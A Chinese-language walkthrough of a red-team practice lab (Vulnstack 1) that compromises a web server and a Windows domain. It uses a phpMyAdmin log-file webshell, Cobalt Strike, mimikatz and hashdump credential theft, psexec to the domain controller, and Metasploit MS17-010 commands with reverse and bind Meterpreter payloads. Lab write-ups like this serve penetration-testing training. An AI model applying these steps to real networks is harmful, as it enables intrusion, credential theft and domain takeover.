Vulnstack 紅隊(一)
靶機為紅日安全分享的靶機
靶機下載地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/
網絡拓展圖
0x01 CS打法
WEB外網機信息收集
端口信息
80端口開放(HTTP) ,3306開放(MYSQL)
訪問WEB服務返回phpStudy探針 root root弱口令嘗試登錄MYSQL成功
掃一波目錄 出現phpmyadmin
登錄phpmyadmin通過日志文件寫入一句話木馬
菜刀連接
我是誰
我在哪
存在域god.org 並且有兩張網卡,192.168.43.1/24是攻擊機與WEB模擬的外網網卡,另外還有一張192.168.52.1/24網卡
tasklist /svc查看進程 對比有無殺軟
對比無殺軟
上線CS && net view
還有WEB外網機的內網IP域成員 192.168.52.143,192.168.52.138為域控,192.168.52.141為域成員
hashdump抓hash密碼
mimikatz抓明文密碼
中轉beacon 監聽IP為WEB服務器 域內網卡IP192.168.52.143就可以跟域內主機通信
portscan掃一波192.168.52.0/24段
查看抓到的憑證
查看目標
最下面那條為WEB外網機
psexec在192.168.52.138上登錄域管憑證
再登錄192.168.52.141
ipconfig /all查看192.168.52.138的網卡
只有一張192.168.52.0/24內網網卡
ipconfig /all查看192.168.52.141的網卡
也只有一張內網網卡
0x02 MSF MS17-010打法
目標處查看域內另外兩台主機的開放端口
發現都開放了SMB 445端口
此時可以CS派生shell到MSF打MS17-010
CS添加外部監聽器
派生到Beacon
use multi/handler調用監聽模塊 && set payload windows/meterpreter/reverse_http 設置HTTP監聽模塊 && set LHOST 192.168.43.128設置監聽IP && set LPORT 666監聽端口 && run/exploit
返回msfShell meterpreter會話
run post/multi/manage/autoroute自動添加路由
background把session放到后台 && use auxiliary/scanner/smb/smb_ms17_010 調用ms17-010掃描模塊 掃描開放445端口的主機
use exploit/windows/smb/ms17_010_eternalblue調用ms17010漏洞利用模塊
目標出網時反向打:set payload windows/x64/meterpreter/reverse_tcp
目標不出網時正向打(如添加了路由):set payload windows/x64/meterpreter/bind_tcp
這里不出網所以set payload windows/x64/meterpreter/bind_tcp
執行完成,但沒返回session
換一台試試
也一樣,可能存在ms17010漏洞,但不返回session,我們換個打法,use auxiliary/admin/smb/ms17_010_command模塊直接執行命令看看
都能遠程執行命令,並且都是system權限,可以添加影子賬戶,再開3389端口,做隧道連接登錄,后面就自行發揮了
打完收工·.·